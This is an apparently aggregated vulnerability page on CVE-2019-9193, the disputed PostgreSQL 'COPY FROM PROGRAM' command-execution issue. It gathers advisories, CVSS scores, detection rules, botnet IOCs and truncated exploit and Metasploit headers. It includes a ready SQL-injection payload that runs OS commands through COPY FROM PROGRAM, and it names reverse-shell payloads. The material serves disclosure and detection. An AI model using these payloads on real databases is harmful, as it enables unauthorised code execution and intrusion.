CVE-2019-9193
published 2019-04-01CVE-2019-9193: In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary…
PriorityP181high7.2CVSS 3.0
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
91.88%
99.8th percentile
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| postgresql | postgresql | 9.3 – 11.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
command'; DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;--↗
sigma↗
regex: ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)- →Alert on brute-force authentication attempts against PostgreSQL (port 5432) using the default 'postgres' username, particularly with common passwords such as '112233' and '1q2w3e4r'. ↗
- →Detect DreamBus ELF binaries with modified UPX headers: the standard UPX magic bytes 0x21585055 ('UPX!') are replaced with non-ASCII values such as 0x3330dddf. Flag ELF binaries where the UPX header magic does not match the standard signature. ↗
- →Monitor for processes impersonating 'tracepath' that are not the legitimate system binary, particularly those spawned from PostgreSQL server processes or located in writable temp directories. ↗
- →Flag HTTP requests with a User-Agent string of a single hyphen ('-') character, which is the hardcoded cURL user-agent used by DreamBus modules for C2 communications. ↗
- →Detect WildFire-style behavioral indicators: self-deletion of the initial payload binary and process name impersonation (e.g., renaming to 'tracepath') shortly after execution from a PostgreSQL context. ↗
- →In PostgreSQL audit logs, alert on any use of 'COPY ... FROM PROGRAM' SQL statements, especially when issued by the 'postgres' superuser account from a remote session. ↗
- ·CVE-2019-9193 is a disputed CVE. The PostgreSQL community argues that 'COPY TO/FROM PROGRAM' is functioning as intended and is not a vulnerability, provided superuser privileges are not granted to remote or untrusted users. Detection should be tuned to context (remote superuser sessions) to avoid false positives on legitimate administrative use. ↗
- ·The PGMiner C2 mining pool was no longer active at time of analysis, so profit/scale data is unavailable and the specific mining pool IOCs may not be actionable for current detections. ↗
- ·At time of publication, none of the VirusTotal vendors detected PGMiner, meaning AV/EDR signature-based detections may be ineffective; behavioral and network-based detections are preferred. ↗
- ·The DreamBus UPX header modification (replacing 0x21585055 with values like 0x3330dddf) breaks the standard UPX unpacking tool, so automated unpacking pipelines relying on the UPX CLI may fail to analyze these samples. ↗
CVSS provenance
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j83j-hfqj-cf5p: ** DISPUTED ** In PostgreSQL 9
ghsa_unreviewed·2022-05-13
CVE-2019-9193 [HIGH] CWE-78 GHSA-j83j-hfqj-cf5p: ** DISPUTED ** In PostgreSQL 9
** DISPUTED ** In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
VulnCheck
postgresql postgresql Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 7.2
CVE-2019-9193 [HIGH] postgresql postgresql Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
postgresql postgresql Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Affected: postgresql postgresql
Required Action: Apply remediations o
Red Hat
postgresql: Command injection via "COPY TO/FROM PROGRAM" function
vendor_redhat·2019-03-20·CVSS 7.2
CVE-2019-9193 [HIGH] CWE-20 postgresql: Command injection via "COPY TO/FROM PROGRAM" function
postgresql: Command injection via "COPY TO/FROM PROGRAM" function
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Statement: The PostgreSQL Project does not consider this to be a vulnerability. By design, database super users have
No detection rules found.
Exploit-DB
PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2023-04-05·CVSS 7.2
CVE-2019-9193 [HIGH] PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019–9193
#!/usr/bin/python3
import sys
import psycopg2
import argparse
def parseArgs():
parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1
Exploit-DB
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2022-03-30
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-03-29
# Exploit Author: b4keSn4ke
# Github: https://github.com/b4keSn4ke
# Vendor Homepage: https://www.postgresql.org/
# Software Link: https://www.postgresql.org/download/linux/debian/
# Version: 9.3 - 11.7
# Tested on: Linux x86-64 - Debian 4.19
# CVE: CVE-2019–9193
#!/usr/bin/python3
import psycopg2
import argparse
import hashlib
import time
def parseArgs():
parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
par
Exploit-DB
PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)
exploitdb·2019-05-08
CVE-2019-9193 PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)
PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)
---
\##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/postgres'
class MetasploitModule 'PostgreSQL COPY FROM PROGRAM Command Execution',
'Description' => %q(
Installations running Postgres 9.3 and above have functionality which allows for the superuser
and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
This allows arbitrary command execution as though you have console access.
This module attempts to create a new table, then execute system commands in the context of
copying the command output into the table.
This module should work on all Postgres systems running
Nuclei
PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
nuclei·CVSS 7.2
CVE-2019-9193 [HIGH] PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Template:
id: CVE-2019-9193
info:
name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
author: pussycat0x
severity:
Metasploit
PostgreSQL COPY FROM PROGRAM Command Execution
metasploit
PostgreSQL COPY FROM PROGRAM Command Execution
PostgreSQL COPY FROM PROGRAM Command Execution
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table. This module should work on all Postgres systems running version 9.3 and above. For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp Alternativly target 3 can be used to execute generic commands, such as a web
Bugzilla
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
bugzilla·2019-04-04·CVSS 7.2
CVE-2019-9193 [HIGH] CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
Bugzilla
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [epel-7]
bugzilla·2019-04-04·CVSS 7.2
CVE-2019-9193 [HIGH] CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [epel-7]
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [epel-7]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-7.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Discussion:
Use the follow
Bugzilla
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
bugzilla·2019-04-04·CVSS 7.2
CVE-2019-9193 [HIGH] CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue af
Bugzilla
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function
bugzilla·2019-04-04·CVSS 7.2
CVE-2019-9193 [HIGH] CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_read_server_files' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS.
References:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
Discussion:
Created mingw-postgresql tracking bugs for this issue:
Affects: epel-7 [bug 1695984]
Affects: fedora-all [bug 1695985]
Created postgresql tracking bugs for this issue:
Affects: fedora-all [bug 1695983]
---
The position of
Zscaler
Malware Analysis of the DreamBus Botnet | Zscaler Blog
blogs_zscaler·2021-01-22
Malware Analysis of the DreamBus Botnet | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Checkpoint
14th December – Threat Intelligence Bulletin
blogs_checkpoint·2020-12-14
CVE-2020-1971 14th December – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 14th December – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 14th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The US Treasury Department and US Department of Commerce were victims of a cyberattack compromising their internal email traffic. Perhaps related , SolarWinds IT management software has been exploited in a supply chain attack, adding malicious code to its software updates released between March and June 2020.
Habana
Unit42
PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
blogs_unit42·2020-12-10·CVSS 7.2
[HIGH] PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
Threat Research Center
Threat Research
Malware
## PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
Xiao Zhang
Yang Ji
Jim Fitzgerald
Yue Chen
Claud Xiao
Published: December 10, 2020
Malware
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
Exploit
PostgreSQL
## Executive Summary
Cryptojacking (or simply malicious coin mining) is a common way for malware authors to monetize their operations. While the underlying mining protocols and techniques remain fairly standard, malware actors tend to seek out and find smarter ways to hack into a victim's machines. Recently, Unit 42 researchers uncovered a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution (RCE) vulnerability that compromises
Unit42
PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
blogs_unit42·2020-12-10·CVSS 7.2
[HIGH] PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
## Executive Summary
Cryptojacking (or simply malicious coin mining) is a common way for malware authors to monetize their operations. While the underlying mining protocols and techniques remain fairly standard, malware actors tend to seek out and find smarter ways to hack into a victim's machines. Recently, Unit 42 researchers uncovered a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution (RCE) vulnerability that compromises database servers for cryptojacking. We named the cryptocurrency mining botnet "PGMiner" after its delivery channel and mining behavior. At its core, PGMiner attempts to connect to the mining pool for Monero mining. Because the mining pool is not active anymore, we could not recover information about the actual pro
CTF
techniques / sql-injection
ctf_writeups
techniques / sql-injection
# SQL Injection (SQLi)
## Overview
SQL Injection occurs when untrusted user input is directly concatenated into a backend database query without proper sanitization or parameterization. This allows an attacker to manipulate the structure of the SQL query to bypass authentication, read unauthorized data, modify records, or execute arbitrary code on the database server.
## When This Happens
- User input is concatenated into queries: `SELECT * FROM users WHERE username = '` + $_GET['user'] + `'`
- Prepared statements are used incorrectly, or specific fields (like `ORDER BY` or `LIMIT`) are not parameterized.
- Data from secondary sources (like HTTP headers or databases) is trusted without validation (Second-Order SQLi).
---
## Recon / Detection
### 1. Identify Input Vectors
Test all para
http://packetstormsecurity.com/files/152757/PostgreSQL-COPY-FROM-PROGRAM-Command-Execution.htmlhttp://packetstormsecurity.com/files/166540/PostgreSQL-11.7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171722/PostgreSQL-9.6.1-Remote-Code-Execution.htmlhttps://blog.hagander.net/when-a-vulnerability-is-not-a-vulnerability-244/https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/https://security.netapp.com/advisory/ntap-20190502-0003/https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authenticated-arbitrary-command-execution-on-postgresql-9-3/http://packetstormsecurity.com/files/152757/PostgreSQL-COPY-FROM-PROGRAM-Command-Execution.htmlhttp://packetstormsecurity.com/files/166540/PostgreSQL-11.7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171722/PostgreSQL-9.6.1-Remote-Code-Execution.htmlhttps://blog.hagander.net/when-a-vulnerability-is-not-a-vulnerability-244/https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/https://security.netapp.com/advisory/ntap-20190502-0003/https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authenticated-arbitrary-command-execution-on-postgresql-9-3/
2019-04-01
Published
Exploited in the wild